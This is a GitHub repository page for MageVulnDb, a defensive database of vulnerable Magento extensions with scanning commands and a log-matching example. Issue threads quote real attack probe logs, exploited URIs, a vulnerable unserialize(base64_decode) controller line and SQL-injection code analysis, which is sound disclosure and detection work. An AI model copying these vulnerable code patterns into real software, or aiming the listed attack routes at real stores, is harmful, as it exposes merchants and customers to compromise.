List of Magento extensions with known security issues.

Overview

Magento Vulnerability Database

List of Magento 1 and 2 integrations with known security issues. Objective: easily identify insecure 3rd party software in your Magento code base. See our blog for the rationale: Bad extensions now main source of Magento hacks & a solution

n98-magerun dev:module:security

Magento 1 list / Magento 2 list

The list contains these columns:

  1. Vendor_Name of the module
    • Reported under M1 using n98-magerun dev:module:list or Mage::getConfig()->getNode()->modules
    • Reported under M2 using bin/magento module:status
  2. The earliest safe version to use. Older entries are considered insecure.
  3. Part of the URL that attackers use to exploit this module. Can be used to search logfiles for malicious activity. (optional)
  4. Reference URL describing the problem. If no public statement is available, then the name of the researcher who discovered it.
  5. URL with upgrade instructions (optional)

Context

Magento is an attractive target for payment skimmers and the number of attacks has increased steadily since 2015. In 2018, attackers shifted from Magento core exploits (e.g., Shoplift, brute force attacks on admin passwords) to 3rd party software components. This poses a practical problem: there is no central place where one can (programmatically) find out whether a particular module version has known security issues. This repository solves that!

Usage

You can quickly scan your site against this repository using a Magerun module or a single-line command. Both require command line or SSH access to the server. Magerun is recommended as it can be easily scheduled or used on an ongoing basis, and provides better output. Both approaches load the latest vulnerability data on every run.

Magerun module (recommended)

  1. Install n98-magerun for Magento 1 or Magento 2.
  2. Install the Magento Vulnerability Database plugin:

For Magento 1:

mkdir -p ~/.n98-magerun/modules
cd ~/.n98-magerun/modules
git clone https://github.com/gwillem/magevulndb.git

For Magento 2:

mkdir -p ~/.n98-magerun2/modules
cd ~/.n98-magerun2/modules
git clone https://github.com/gwillem/magevulndb.git

  3. Scan your Magento install:

n98-magerun.phar dev:module:security

You can also use the -q flag to limit output to findings only.

n98-magerun.phar dev:module:security -q

You can check the exit code, for example to fail a build when a vulnerable module is detected:

  • exit code 0: no known vulnerabilities found
  • exit code 1: known vulnerabilities found
  • exit code 2: vulnerability data could not be loaded

No magerun installed under Magento 1?

To quickly check a Magento installation for vulnerable modules, run this command in SSH at your Magento 1 site root:

php -r 'require_once("app/Mage.php");Mage::app();$config=Mage::getConfig()->getNode()->modules;$found=array();$list=fopen("https://raw.githubusercontent.com/gwillem/magevulndb/master/magento1-vulnerable-extensions.csv","r");while($list&&list($name,$version)=list($row["module"],$row["fixed_in"],,$row["reference"],$row["update"])=fgetcsv($list)){if(isset($name,$version,$config->{$name},$config->{$name}->version)&&(empty($version)||version_compare($config->{$name}->version,$version,"<"))){$found[]=$row;}}if($found){echo "Found possible vulnerable modules: ".print_r($found,1);exit(1);}else{echo "No known vulnerable modules detected.";}'

You can check the exit code, for example to fail a build when a vulnerable module is detected:

  • exit code 0: no known vulnerabilities found
  • exit code 1: known vulnerabilities found

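This script only works under Magento 1. For Magento 2, use Magerun instead. Note that if the list cannot be downloaded (for example when allow_url_fopen is disabled or the server has no outbound access), the loop is skipped and the script still reports that no vulnerable modules were detected.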

Contributing

Contributions welcome. Requirements:

  • Either "name" or "uri" (in case of exploitation in the wild) is required.
  • A reputable, verifiable source is required.
  • In case of admin URL disclosure: the issue is not fixed by disabling the security compatibility mode

Only security issues that have verified proof or are being actively exploited in the wild should be considered.

Please consider responsible disclosure before submitting zero-day vulnerabilities. If no immediate abuse is likely, please notify the vendor first and allow 30 days for a patch & release statement.

FAQ

Why a new repository?

There are many good initiatives already, however they either lack a simple web GUI, are too complicated to maintain or do not cover all extensions out there. For Magento 2, there is already excellent support via composer, please refer to Roave's SecurityAdvisories for automated composer integration. Still, Roave's approach requires you to run a composer command to check for new updates. With this Magerun command, you can leave the composer files untouched. Obviously, it also works on Magento 1 and 2 installs that are not managed by composer at all.

What if a module has multiple security issues over time?

We register the newest only and advise everybody to upgrade to the latest version. If people want to stick to an older (possibly insecure) version, they should study the relevant changelogs.

What about modules that are known under several names?

The name as registered in the code (and output by n98-magerun dev:module:list) is leading. If a module is known under several (code) names, then we should create duplicate entries, so that automated tools will not ignore such an entry.

What if I don't know the module name?

If you have a URL that is being attacked but don't know what module it belongs to, submit it but leave the name "?". It will be backfilled when the actual module is identified.

There are multiple sources, which should I use?

If the vendor has issued a security statement, that should be leading. Otherwise, a statement by a security researcher (Blog/Twitter) can be used. If a vendor has issued a statement that is false or misleading, an independent statement should take precedence.

We could add more information X?

Indeed, but the main advantage of a simple CSV with few columns is that it's easy to browse, maintain and extend. Other projects have stalled because there is too much overhead in vulnerability administration. The primary objective of this repository is to support a n98-magerun command. If people want more information, they can look it up via the referenced source.

What is the Relevant URI column for?

This can be used by tools to filter "suspicious" web traffic from the logs, for example to check if malicious activity has already taken place. The URI should be enough to uniquely match the module's vulnerable URL(s), if possible.

What if there are multiple relevant URLs?

Separate them with a ";".
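
The log check this column enables, as an added example that is not code from this repository: it reads rows in the column order listed above, splits the URI column on ";" and reports access-log requests whose path contains a listed URI. The CSV rows, log lines, module names and function names are constructed for illustration; case-insensitive matching on the URL-decoded path is an assumption.

```python
import csv
import io
import re
from urllib.parse import unquote

# Constructed sample rows in the column order the page lists:
# name, fixed-in version, relevant URI(s), reference, upgrade URL.
SAMPLE_CSV = """\
Example_Gift,1.2.3,/freegift/cart/gurlgift/,https://example.com/advisory,
?,,/sendinblue/ajax/ajaxupdate/,researcher name,
_Example_Forms,2019-01-15,/exampleforms/index/upload;/exampleforms/index/submit,https://example.com/ref,https://example.com/upgrade
Example_NoUri,2.0.0,,https://example.com/ref2,
"""

# Constructed access-log lines: one JSON-style, three plain-text.
SAMPLE_LOG = [
    '{"time":"2022-07-18T13:29:40+00:00", "remote_addr":"192.0.2.10", '
    '"request":"POST /sendinblue/ajax/ajaxupdate/ HTTP/1.1", "status":"200"}',
    '198.51.100.7 - [05/Jan/2019:16:44:21 +0000] '
    '"GET /FreeGift/cart/gurlgift/?data=x HTTP/1.1" 403 2988 "" ""',
    '198.51.100.7 - [05/Jan/2019:16:45:02 +0000] '
    '"GET /exampleforms/index/%75pload HTTP/1.1" 200 512 "" ""',
    '203.0.113.5 - [05/Jan/2019:16:46:00 +0000] '
    '"GET /checkout/cart/ HTTP/1.1" 200 9001 "" ""',
]

# The quoted request line looks the same in both log formats.
REQUEST_RE = re.compile(
    r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH) (\S+) HTTP/[\d.]+"'
)


def load_uri_patterns(csv_text):
    """Return [(uri_fragment, module_name, fixed_in)] for rows that list a URI."""
    patterns = []
    for row in csv.reader(io.StringIO(csv_text)):
        if len(row) < 3:
            continue  # blank or malformed row
        name, fixed_in, uris = (cell.strip() for cell in row[:3])
        for uri in uris.split(";"):  # several URIs are separated by ";"
            uri = uri.strip().lower()
            if uri:
                patterns.append((uri, name or "?", fixed_in))
    return patterns


def request_path(line):
    """Extract the request path, without query string, decoded and lowercased."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    path = match.group(1).split("?", 1)[0]
    # Decode %xx so a percent-encoded path still matches (assumption: the
    # application decodes the path before routing).
    return unquote(path).lower()


def scan(log_lines, patterns):
    """Return one hit per (log line, matching URI fragment)."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        path = request_path(line)
        if path is None:
            continue
        for uri, name, fixed_in in patterns:
            if uri in path:
                hits.append({"line": lineno, "module": name,
                             "fixed_in": fixed_in, "uri": uri, "path": path})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, load_uri_patterns(SAMPLE_CSV)):
        print("line {line}: {path} matches {uri} "
              "(module {module}, fixed in {fixed_in!r})".format(**hit))
```

A hit shows that the URL was requested, not that the request succeeded; compare the response status and what the same client requested next.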

What if a module does not have version numbers?

Use the date of the fix in YYYY-MM-DD notation.

What if the vendor provides a fix but does not update the version number?

Some Magento 1 modules, such as Mirasvit (discussion), do not use the standard version numbering, so vulnerable versions cannot be automatically detected. To eliminate false alarms, all such modules are prefixed with an underscore, so the automatic module parser will not recognize them. It is suboptimal but better than not storing information at all.

Acknowledgements

These Magento/security professionals have contributed valuable research and code:

  • Ryan Hoerr - ParadoxLabs
  • Peter O'Callaghan
  • Max Chadwick - Something Digital
  • Jeroen Vermeulen - MageHost.pro
  • Roland Walraven - MageHost.pro
  • Martin Pachol - MageMojo
  • Jisse Reitsma - Yireo
  • Niko Granö - Lamia.fi
  • Martien Mortiaux - AlterWeb.nl

License

The information and code of this repository is provided free of charge, without warranty or assumed liability of any kind. Merchants and development agencies are free to use this data to assess their own stores. It is not allowed to use or include this data in commercial products or offerings.

Contact

[email protected]

Comments
  • Mirasvit_Helpdesk vulnerable up to version 1.5.14

    There was no security announcement, but Mirasvit_Helpdesk has a "possible XSS security issue" up to 1.5.14: https://mirasvit.com/doc/extension_helpdesk/current/changelog

    Note that MageVulnDb may report an older version for Mirasvit_Helpdesk than you actually have installed because a new marketing version might not trigger a change in config.xml. For example, marketing version 1.5.11 has the XML config entry <version>1.0.36</version>.

    I will update this issue when I know if 1.5.14 has a newer XML config version.

    opened by mzeis 10
  • Add BL_CustomGrid

    See https://xn--gran-8qa.fi/magento-1-bl-customgrid-security-flaw/ for reference. I will provide the update URL for the fixed version later. (I will fork this and provide the update.)

    Closes #28

    opened by NikoGrano 9
  • Many Amasty vulnerabilities

    Search Amasty site for security changelogs, there are MANY:

    https://www.google.nl/search?q="security+issues"+site:amasty.com

    I've included a few in this PR. However, I have guessed the internal name from these pages. Help welcome in validating / adding the others.

    opened by gwillem 9
  • n98-magerun module?

    @rhoerr used this for his JSON files, we'll only need to parse CSV files and turn it into a magerun plugin.

    <?php
    require_once("app/Mage.php");
    Mage::app();
    
    $c = Mage::getConfig()->getNode()->modules;
    $v = json_decode(file_get_contents("https://something.example.com/magento-vuln-extensions/m1-list.json"),1);
    $f = array();
    foreach ($v as $m) {
    	if (isset($c->{$m["module"]}, $c->{$m["module"]}->version)) {
    		$i = $c->{$m["module"]}->version;
    		if ((empty($m["fixed_in"]) || version_compare($i, $m["fixed_in"], "<"))
    			&& (empty($m["version_from"]) || version_compare($i, $m["version_from"], ">="))) {
    			$f[] = $m;
    		}
    	}
    }
    
    if ($f) {
    	echo "Found potentially vulnerable modules: ".print_r($f,1);
    } else {
    	echo "No known vulnerable modules detected.\n";
    }
    
    opened by gwillem 8
  • Add Mageplaza Layered Navigation XSS Vulnerability

    As per: https://www.mageplaza.com/releases/layered-navigation/

    Do we have a way to split module versions? Mageplaza are currently maintaining a Magento 2.3 and a Magento 2.4 version of this module which have different release lines e.g. 2.3 = 2.x, 2.4 = 4.x

    I've added both versions in this PR but appreciate this will likely cause issues e.g. a person on Magento 2.3 with v2.5.2 of Layered Navigation will probably get an alert to upgrade to 4.1.2 despite already having the XSS patch applied.

    opened by itmsenior 7
  • Need PoC for Sendinblue Magento1 vulnerability

    Observed attack placing backdoor via /sendinblue/ajax/ajaxupdate/. Version of plugin: 1.1.9. No direct RCE (eval/unserialize) was found in plugin's code. Perhaps the plugin acts as gateway to a M1 vuln?

    {"time":"2022-07-18T13:29:40+00:00", "remote_addr":"217.170.207.111", "remote_user":"", "host":"REDACTED", "request":"POST /sendinblue/ajax/ajaxupdate/ HTTP/1.1", "status":"200", "body_bytes_sent":"31", "referer":"", "user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "request_time":"0.463", "handler":"phpfpm", "country":"NO", "port":"443", "ssl_cipher":"TLS_AES_256_GCM_SHA384", "ssl_protocol":"TLSv1.3"}
    
    {"time":"2022-07-18T13:29:40+00:00", "remote_addr":"217.170.207.111", "remote_user":"", "host":"REDACTED", "request":"GET /api_1.php HTTP/1.1", "status":"200", "body_bytes_sent":"37", "referer":"", "user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "request_time":"0.002", "handler":"phpfpm", "country":"NO", "port":"443", "ssl_cipher":"TLS_AES_256_GCM_SHA384", "ssl_protocol":"TLSv1.3"}
    
    opened by jspanjerberg 5
  • Blacklist Bss_MultiWishlist (CWE-79)

    More information can be found at https://xn--gran-8qa.fi/bss-multiwishlist-xss-injection/ after the 3 days given to the vendor have passed. I have also provided them a fix for this issue, so it's just a matter of releasing a patched version. The fixing version will be added when it is known.

    I'm requesting this to be added on the list.

    Reference for BSS: 17573.

    opened by NikoGrano 5
  • Amasty_PAction Maybe CWE-89?

    I'm honestly lost with this and because of that I'm requesting help. Please review this and tell me your thoughts. I kinda need another pair of eyes to take a look. (I can share module code privately for inspection if requested.)

    So, possible CWE-89 here. image

    At a quick look, this code looked like there is an injection for sure. However, the first and second parameters for sprintf are safe, because those are not user input. However, the third parameter is taken from the request.

    // Amasty_Paction_Adminhtml_AmpactionController
    public function doAction()
        {
            $productIds  = $this->getRequest()->getParam('product');  // Please notice this.
            $val         = $this->getRequest()->getParam('ampaction_value');
            $dateFrom    = $this->getRequest()->getParam('ampaction_from');
            $dateTo      = $this->getRequest()->getParam('ampaction_to');
            $commandType = trim($this->getRequest()->getParam('command'));
            $storeId     = (int)$this->getRequest()->getParam('store', 0);
            $enhanced    = $this->getRequest()->getParam('enhanced', 0);
            
            if (Mage::getSingleton('admin/session')->isAllowed('catalog/products/mass_product_actions/' . $commandType)) {
                if (is_array($val)) {
                    $val = implode(',', $val);
                } elseif ('appendtext' !== $commandType) {
                    $val = trim($val);
                }
    
                try {
                    $command = Amasty_Paction_Model_Command_Abstract::factory($commandType, $dateFrom, $dateTo);
                    $success = $command->execute($productIds, $storeId, $val); // Vulnerable code is called here!
                    
                  
                    if ($success) {...}
                    foreach ($command->getErrors() as $err) {...}            
                } catch (Exception $e) {
                    ...
                }
            } else {
                $this->_getSession()->addError($this->__('Access denied.'));
            }
    
            if ($enhanced) {...} else {...}
    
            return $this;        
        }
    

    In the above code, please notice lines 4 and 21. On line 4 we fetch the product ids as an array of ids. We pass this on line 21 to the execute function.

    So, what happens in the function is the problematic thing. As said before, the first and second parameters are fine in the sprintf function, but the third one, well, we just implode this array to a comma separated list without escaping or binding params! Let's see the whole problematic script.

    // Amasty_Paction_Model_Command_Replacetext
    // Starting from line 82.
    if ($backendType == 'static') {
        $set = '';
        foreach ($attrIds as $attrId => $attrName) {
            $set .= sprintf(
                '`%s` = REPLACE(`%s`, %s, %s)', $attrName,
                $attrName, $db->quote($searchReplace['search']),
                $db->quote($searchReplace['replace'])
            );
        }
        $sql = sprintf('UPDATE %scatalog_product_entity
                      SET %s
                      WHERE entity_id IN(%s)
                        AND entity_type_id = %d',
            Mage::getConfig()->getTablePrefix(), $set, implode(',', $ids), // <==
            $entityTypeId
        );
    } else {
        $sql = sprintf('UPDATE %scatalog_product_entity_%s
                      SET `%s` = REPLACE(`%s`, %s, %s)
                      WHERE attribute_id IN (%s)
                        AND entity_id IN(%s)
                        AND entity_type_id = %d
                        AND store_id=%d',
            Mage::getConfig()->getTablePrefix(), $backendType, self::REPLACE_FIELD, self::REPLACE_FIELD,
            $db->quote($searchReplace['search']), $db->quote($searchReplace['replace']), // <==
            implode(',', array_keys($attrIds)), implode(',', $ids), // <==
            $entityTypeId, $storeId
        );
    }
    $db->query($sql);
    

    However, here I see %d is used instead of %s, which means that it is not possible to inject. On the other hand, I saw the following on the official PHP site here.

    image

    So is my theory about having injection crushed and is quote safe to use, or should binding be used? And yes, I would say binding params should be used, but should the quote be classified as a security flaw?

    opened by NikoGrano 5
  • Added AW_Autorelated - SQL injection

    I found a security issue in the AheadWorks Automatic Related Products module where you can inject SQL. I tested it on multiple Magento installations and multiple versions of this module (since 2.4.2 released at least 4.5 years ago) including the latest version (2.5.0).

    I reported this issue to AheadWorks. Once AheadWorks releases a patched version I will add its version number and change the url for upgrade instructions.

    opened by AlterWeb 5
  • How to mark "Potential vulnerable module found" as safe?

    When magevulndb marks an extension as potentially unsafe:

    Potential vulnerable module found: Foo_Bar
    Matched by route: This may be a false positive where your installed module
    shares it with a vulnerable module, but it should be investigated further.
    Please contribute info about the module to MageVulnDb if it is relevant.
    

    And this is a false positive, and the module is project specific (i.e. there is value to add it to MageVulnDb), how can I mark the module as safe so that our build passes?

    opened by mzeis 4
  • Question: How to verify "Potential vulnerable module" is vulnerable?

    I got

    Potential vulnerable module found: Glace_Freegift
    Matched by route: This may be a false positive where your installed module
    shares it with a vulnerable module, but it should be investigated further.
    Please contribute info about the module to MageVulnDb if it is relevant.
    Route:      freegift
    Looks Like: /freegift/cart/gurlgift/
    Module:     Glace_Freegift
    Installed:  0.2.1
    Credit:     https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/
    

    But how could I verify that this module is exactly the vulnerable module you expect it to be?

    opened by kkrieger85 4
  • Multi branch version support

    As discussed here. Some extensions release multiple branches, our data format currently doesn't support non-sequential security classification. https://github.com/sansecio/magevulndb/pull/92

    opened by gwillem 0
  • MW_FreeGift

    MW_FreeGift v3.3.3.7 for Magento 1 has a (most likely) unserialize vulnerability that is actually being exploited in the wild. I could not find a vendor provided changelog. The vendor also offers a version for Magento 2, its security status is unknown.

    // MW/FreeGift/controllers/CartController.php
    $params = unserialize(base64_decode($this->getRequest()->getPost('data')));
    
    opened by gwillem 3
  • Pixlogix_Flexibleforms

    FYI we found malicious PHP code in the media/flexibleforms/files/ on two separate installs, one running 2.0.1 (M2) and one running 0.5.0. Should look into the vuln and affected versions (cannot tell if 2.0.1 was compromised or an older version).

    Edit: we contacted the vendor last month but they did not reply

    opened by gwillem 4
  • Confirm Amasty M2 module tags

    Following #41:

    We need to confirm several module tags on the M2 list:

    • Amasty_Adminbookmarks
    • Amasty_GeoipRedirect
    • Amasty_Storeswitcher

    Case sensitive, must be exactly correct.

    opened by rhoerr 3
  • More POI probes

    185.198.56.4 - [05/Jan/2019:16:44:21 +0000] "GET /customerconnect/rfqs/configureproduct/?options=[...] HTTP/1.1" 403 2988 "" ""
    185.198.56.4 - [06/Jan/2019:17:16:07 +0000] "GET /vendors/credit/withdraw/review/?data=[...] HTTP/1.1" 403 2988 "" ""
    109.237.138.20 - [06/Jan/2019:18:23:37 +0000] "GET /comm/returns/configureproduct/?options=[...] HTTP/1.1" 403 2988 "" ""

    opened by gwillem 3
Owner
Sansec
Helping merchants stay ahead of hacks